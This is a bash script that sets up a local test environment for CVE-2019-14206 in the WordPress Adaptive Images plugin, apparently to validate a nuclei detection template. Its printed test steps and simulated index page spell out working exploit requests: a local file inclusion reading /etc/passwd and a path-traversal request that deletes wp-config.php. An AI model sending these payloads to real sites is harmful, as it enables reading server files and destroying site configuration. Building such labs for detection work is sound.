#!/bin/bash
# CVE-2019-14206 - Setup Real Plugin Environment
# Downloads the real vulnerable plugin and sets up test environment

echo "=========================================="
echo "CVE-2019-14206 Real Plugin Setup"
echo "=========================================="
echo ""

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m'

PLUGIN_DIR="/Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/plugin"
DOCKER_TEST_DIR="/Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test"

echo -e "${YELLOW}[*] Setting up real vulnerable plugin environment...${NC}"
echo ""

# Create plugin directory
mkdir -p "$PLUGIN_DIR"
mkdir -p "$DOCKER_TEST_DIR/wp-content/plugins/adaptive-images"
mkdir -p "$DOCKER_TEST_DIR/wp-content/uploads/2019/07"
mkdir -p "$DOCKER_TEST_DIR/wp-content/cache/ai-cache"

echo -e "${GREEN}[+] Directories created${NC}"

# Try to download real plugin from WordPress SVN
echo ""
echo -e "${YELLOW}[*] Attempting to download real plugin from WordPress...${NC}"

cd "$PLUGIN_DIR"

# Try WordPress SVN
SVN_URL="https://plugins.svn.wordpress.org/adaptive-images/tags/0.6.66/"

echo "Trying SVN: $SVN_URL"

# Download main plugin file
if curl -L -o "$PLUGIN_DIR/adaptive-images.php" "$SVN_URL/adaptive-images.php" 2>/dev/null; then
    if [ -s "$PLUGIN_DIR/adaptive-images.php" ] && [ $(wc -c < "$PLUGIN_DIR/adaptive-images.php") -gt 100 ]; then
        echo -e "${GREEN}[+] Downloaded adaptive-images.php from SVN${NC}"
    else
        echo -e "${YELLOW}[!] SVN download failed, using local version${NC}"
    fi
fi

# Download vulnerable script
if curl -L -o "$PLUGIN_DIR/adaptive-images-script.php" "$SVN_URL/adaptive-images-script.php" 2>/dev/null; then
    if [ -s "$PLUGIN_DIR/adaptive-images-script.php" ] && [ $(wc -c < "$PLUGIN_DIR/adaptive-images-script.php") -gt 100 ]; then
        echo -e "${GREEN}[+] Downloaded adaptive-images-script.php from SVN${NC}"
    else
        echo -e "${YELLOW}[!] SVN download failed, using local version${NC}"
    fi
fi

# Download readme
if curl -L -o "$PLUGIN_DIR/readme.txt" "$SVN_URL/readme.txt" 2>/dev/null; then
    if [ -s "$PLUGIN_DIR/readme.txt" ] && [ $(wc -c < "$PLUGIN_DIR/readme.txt") -gt 100 ]; then
        echo -e "${GREEN}[+] Downloaded readme.txt from SVN${NC}"
    fi
fi

echo ""

# Verify we have the vulnerable script
if [ -f "$PLUGIN_DIR/adaptive-images-script.php" ]; then
    echo -e "${GREEN}[+] Vulnerable script exists${NC}"
    echo "  Size: $(wc -c < "$PLUGIN_DIR/adaptive-images-script.php") bytes"
else
    echo -e "${RED}[-] Vulnerable script not found${NC}"
    echo -e "${YELLOW}[!] Using local version${NC}"
fi

# Copy to Docker test directory
echo ""
echo -e "${YELLOW}[*] Setting up Docker test environment...${NC}"

# Copy plugin files
cp "$PLUGIN_DIR/adaptive-images-script.php" "$DOCKER_TEST_DIR/wp-content/plugins/adaptive-images/"

# Create WordPress simulation files
cat > "$DOCKER_TEST_DIR/index.php" << 'EOF'
<?php
/**
 * WordPress Front Page Simulation
 * 
 * This is a simulation for testing purposes only.
 */
echo "<!DOCTYPE html>";
echo "<html>";
echo "<head><title>WordPress Site</title></head>";
echo "<body>";
echo "<h1>WordPress Site</h1>";
echo "<p>Adaptive Images Plugin: Active</p>";
echo "<p>Version: 0.6.66 (VULNERABLE)</p>";
echo "<p>Script: /wp-content/plugins/adaptive-images/adaptive-images-script.php</p>";
echo "<hr>";
echo "<h2>Vulnerability Test</h2>";
echo "<p>Test LFI: <code>?adaptive-images-settings[source_file]=/etc/passwd</code></p>";
echo "<p>Test File Deletion: <code>?adaptive-images-settings[source_file]=...&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1</code></p>";
echo "</body>";
echo "</html>";
EOF

# Create test image
echo "GIF89a-test-image" > "$DOCKER_TEST_DIR/wp-content/uploads/2019/07/image.jpeg"

# Create target file (wp-config.php simulation)
cat > "$DOCKER_TEST_DIR/wp-config.php" << 'EOF'
<?php
/**
 * WordPress Configuration File
 * 
 * TARGET FILE FOR CVE-2019-14206 EXPLOIT
 * 
 * WARNING: This file will be DELETED by the exploit!
 */
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'wordpress');
define('DB_HOST', 'localhost');

// Security keys
define('AUTH_KEY', 'cve-2019-14206-test-key-' . time());
define('LOGGED_IN_KEY', 'test-logged-in-key');
define('NONCE_KEY', 'test-nonce-key');

// Database
$table_prefix = 'wp_';

// Debug
define('WP_DEBUG', true);

echo "WP Config loaded successfully\n";
EOF

# Create .htaccess
cat > "$DOCKER_TEST_DIR/.htaccess" << 'EOF'
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# Allow access to adaptive-images-script.php
RewriteRule ^wp-content/plugins/adaptive-images/adaptive-images-script.php$ - [L]
EOF

echo -e "${GREEN}[+] Docker test environment configured${NC}"

# Show environment info
echo ""
echo -e "${BLUE}[*] Environment Summary:${NC}"
echo "----------------------------------------"
echo "Plugin Directory: $PLUGIN_DIR"
echo "Test Directory: $DOCKER_TEST_DIR"
echo ""
echo "Plugin Files:"
ls -lh "$PLUGIN_DIR/"
echo ""
echo "Test Environment Files:"
ls -lh "$DOCKER_TEST_DIR/"
echo ""

# Show how to use
echo -e "${YELLOW}[*] How to Test:${NC}"
echo "----------------------------------------"
echo ""
echo "1. Start PHP built-in server:"
echo "   cd $DOCKER_TEST_DIR"
echo "   php -S localhost:8888"
echo ""
echo "2. Test LFI vulnerability:"
echo "   curl 'http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd'"
echo ""
echo "3. Test file deletion:"
echo "   curl 'http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1'"
echo ""
echo "4. Verify wp-config.php was deleted:"
echo "   ls -la $DOCKER_TEST_DIR/wp-config.php"
echo ""
echo "5. Run nuclei template:"
echo "   nuclei -t /Volumes/Codingsh/experimentos/nuclei-templates/http/cves/2019/CVE-2019-14206.yaml -u http://localhost:8888 -debug"
echo ""

# Final check
if [ -f "$DOCKER_TEST_DIR/wp-content/plugins/adaptive-images/adaptive-images-script.php" ]; then
    echo -e "${GREEN}[+] Real plugin setup COMPLETE!${NC}"
    echo -e "${GREEN}[+] Ready for testing!${NC}"
else
    echo -e "${RED}[-] Setup incomplete${NC}"
fi

echo ""
echo "=========================================="
